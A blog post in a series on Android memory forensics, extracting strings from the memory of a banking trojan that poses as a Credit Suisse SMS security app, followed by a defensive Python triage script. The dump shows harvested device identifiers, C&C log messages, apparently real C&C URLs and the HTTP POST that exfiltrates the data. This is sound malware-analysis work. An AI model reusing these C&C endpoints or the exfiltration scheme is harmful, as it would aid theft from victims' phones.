Thursday, October 15, 2015

Android Memory Analysis (III) - Analyzing the data

In the last post I extracted the important memory blocks assigned to the suspicious process. Now I will check the content of those blocks.

The first approach I will use is to run the UNIX command 'strings' against the file 'task.17145.0x12e01000.vma' and see if there is anything interesting.



Extracting data with 'strings'


$ strings task.17145.0x12e01000.vma | more


AppName=CreditSuisse SmsSecurity;
Version=3.8;
DefaultApp=Yes;
Admin=No;
SimState=READY;
SimCountryCode=ch;
SimOperatorCode=22854;
SimOperatorName=Lycamobile;
SimSerialNumber=*******************
PhoneNumber=;
DeviceIMEI=************
SubscriberId=*******
NETWORK=wifi;
BRAND=google;
FINGERPRINT=google/hammerhead/hammerhead:5.1.1/LMY48I/2074855:user/release-keys;
MANUFACTURER=LGE;
MODEL=Nexus 5;
PRODUCT=hammerhead;
OS_Info=os.name: Linux | os.arch: armv7l | os.version: 3.4.0-g5170b88 | java.vendor: The Android Project | java.version: 0
QXBwTmFtZT1DcmVkaXRTdWlzc2UgU21zU2VjdXJpdHk7ClZlcnNpb249My44Owo7CkRlZmF1bHRBcHA9WWVzOwpBZG1pbj1ObzsKU2ltU3RhdGU9UkVBRFk7ClNpbUNvdW50cnlDb2RlPWNoOwpTaW1PcGVyYXRvckNvZGU9MjI4NTQ7ClNpbU9wZXJhdG9yTmFtZT1MeWNhbW9iaWxlOwpTaW1TZXJpY***********************xMDAyODU4MDgyMDsKUGhvbmVOdW1iZXI9OwpEZXZpY2VJTUVJPTM1ODI0MDA1MTkzMjU2NDsKU3Vic2NyaWJlcklkPTIyODU0MDAwMjg1ODA4MjsKTkVUV09SSz13aWZpOwpCUkFORD1nb29nbGU7CkZJTkdFUlBSSU5UPWdvb2dsZS9oYW1tZX*****************lcmhlYWQ6NS4xLjEvTE1ZNDhJLzIwNzQ4NTU6dXNlci9yZWxlYXNlLWtleXM7Ck1BTlVGQUNUVVJFUj1MR0U7Ck1PREVMPU5leHVzIDU7ClBST0RVQ1Q9aGFtbWVyaGVhZDsKT1NfSW5mbz1vcy5uYW1lOiBMaW51eCB8IG9zLmFyY2g6IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWc1MTcwYjg4IHwgamF2YS52ZW5k
b3I6IFRoZSBBbmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=



a:4:{s:6:"device";s:750:"QXBwTmFtZT1DcmVkaXRTdWlzc2UgU21zU2VjdXJpdHk7ClZlcnNpb249My44Owo7CkRlZmF1bHRB...";s:3:"cmd";s:3:"log";s:3:"rid";s:2:"25";s:4:"data";s:69:"a:2:{s:7:"LogCode";s:4:"PASS";s:7:"LogText";s:16:"Rand code: 67302";}";}



<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="Pref5"></string>
    <int name="PASSADDED" value="67302" />
    <int name="DEL" value="0" />
    <string name="Num5"></string>
    <string name="filters"></string>
    <string name="Num10"></string>
    <int name="RID" value="25" />
    <string name="PHONE_NUMBER"></string>
    <int name="FIRST_ACTIVITY" value="1" />
    <int name="RTB" value="0" />
    <string name="IMEI">***********</string>
    <string name="Pref10"></string>
    <string name="USE_URL_MAIN">http://anman.com/img/main.php</string>
    <string name="Pref3"></string>
    <string name="URL_MAIN">http://anman.com/img/main.php;http://frankstain.com/allrent/om/main.php</string>
    <string name="Pref1"></string>
    <string name="Num1"></string>
    <string name="Num3"></string>

</map>

NfvnkjlnvkjKCNXKDKLFHSKD:LJmdklsXKLNDS:<XObcniuaebkjxbcz$


Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0



a:2:{s:7:"LogCode";s:4:"PASS";s:7:"LogText";s:16:"Rand code: 67302";}
!(Ew

T)J("

4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a


12345678
12345678
'PV<
User-agent
Content-Type
Pragma
no-cache
anman.com
Connection
Keep-Alive
Accept-Encoding
Content-Length

i=McsZtRV7Bv7ZjMSzwk5...A%2FFIjkPOweOoHRvNnv%2By5XF4B216Rozw%0A&s=&
POST /img/main.php HTTP/1.1
application/x-www-form-urlencoded; charset=UTF-8
,pppAp
,ppR)p
,pppAp
,ppR)p@


HTTP/1.1 500 Internal Server Error
Date: Sat, 05 Sep 2015 17:53:11 GMT
Server: Apache PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.5.28-1~dotdeb+7.1
Connection: close
Set-Cookie: PHPSESSID=4ui04g3eo19adndud5n42a4i03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html



a:2:{s:7:"LogCode";s:5:"START";s:7:"LogText";s:15:"Service started";}
T)J("
hy"p
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a
application/x-www-form-urlencoded; charset=UTF-8
,pppAp

,ppR)p

Basically, some evidence is visible in clear text. For example, we can see the HTTP communication: the URL, the user-agent, the POST content, and other strings that look like C&C commands. There is also a very interesting string:

"4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a".
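As an added example (not from the original post), here is a small Python triage script that applies the same idea programmatically: it pulls printable runs out of a dump the way `strings` does, then decodes the artifact types seen above (base64 configuration text, hex-encoded text, PHP-serialized C&C messages and HTTP request lines). The sample bytes, the AppName value and the helper names are constructed for this example; only the hex string is the one quoted above.

```python
import base64, re, string

PRINTABLE = set(string.printable.encode()) - {0x0b, 0x0c}   # ASCII text incl. tab/newline

def php_unserialize(s: str, pos: int = 0):
    """Parse the PHP serialize() subset seen in the dump: s:len:"..."; and a:n:{k;v;...}.
    ASCII only (PHP lengths are byte counts). Returns (value, offset just past it)."""
    kind, n_end = s[pos], s.index(":", pos + 2)
    n, pos = int(s[pos + 2:n_end]), n_end + 2                 # skip  :"  or  :{
    if kind == "s":
        return s[pos:pos + n], pos + n + 2                    # skip  ";
    if kind == "a":
        out = {}
        for _ in range(n):
            key, pos = php_unserialize(s, pos)
            out[key], pos = php_unserialize(s, pos)
        return out, pos + 1                                   # skip  }
    raise ValueError(f"unsupported PHP type {kind!r} at offset {pos}")

def decode_encoded(s: str):
    """("hex"|"base64", text) when s is an encoding of printable ASCII, else None."""
    if len(s) >= 16 and re.fullmatch(r"(?:[0-9a-fA-F]{2})+", s):
        kind, raw = "hex", bytes.fromhex(s)
    elif len(s) >= 16 and len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        kind, raw = "base64", base64.b64decode(s, validate=True)
    else:
        return None
    return (kind, raw.decode("ascii")) if all(b in PRINTABLE for b in raw) else None

def triage(blob: bytes):
    """Tag the strings worth a second look: PHP-serialized C&C messages, hex/base64 text, HTTP lines."""
    hits = []
    for m in re.finditer(rb"[\x20-\x7e\t]{4,}", blob):        # what `strings -n 4` would print
        s = m.group().decode("ascii")
        if s.startswith("a:") and s.endswith("}"):
            try:
                hits.append(("php", php_unserialize(s)[0]))
            except (ValueError, IndexError):                  # truncated or unsupported payload
                pass
        elif (dec := decode_encoded(s)) is not None:
            hits.append(dec)
        elif re.match(r"(?:GET|POST) /\S* HTTP/1\.[01]$|HTTP/1\.[01] \d{3} ", s):
            hits.append(("http", s))
    return hits

# Constructed sample "memory" (not the post's dump): junk bytes around a base64 config blob,
# the hex string quoted in the post, a PHP-serialized C&C log line and an HTTP request line.
CONFIG_B64 = base64.b64encode(b"AppName=Example App;Version=3.8;DefaultApp=Yes;").decode()
HEX_STRING = "4e66766e6b6a6c6e766b6a4b434e584b444b4c4648534b443a"
PHP_LOG = 'a:2:{s:7:"LogCode";s:4:"PASS";s:7:"LogText";s:16:"Rand code: 67302";}'
PARTS = [CONFIG_B64.encode(), HEX_STRING.encode(), PHP_LOG.encode(), b"POST /img/main.php HTTP/1.1"]
SAMPLE = b"\x00\x8f" + b"\x00\xff".join(PARTS) + b"\x01\x02"
```

Running `triage(SAMPLE)` returns the four tagged artifacts in dump order; pointing it at a real VMA file (`triage(open(path, "rb").read())`) lists the same kinds of strings the post walks through, already decoded.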



Using a hex editor to analyse the memory dump

Another approach is to use a hex editor, like 'hexedit' on UNIX or Mac OS X.

$ hexedit task.17145.0x12e01000.vma

As we can see, the same information is visible with both methods.

In the next post I will start investigating what information can be gathered from the evidence found.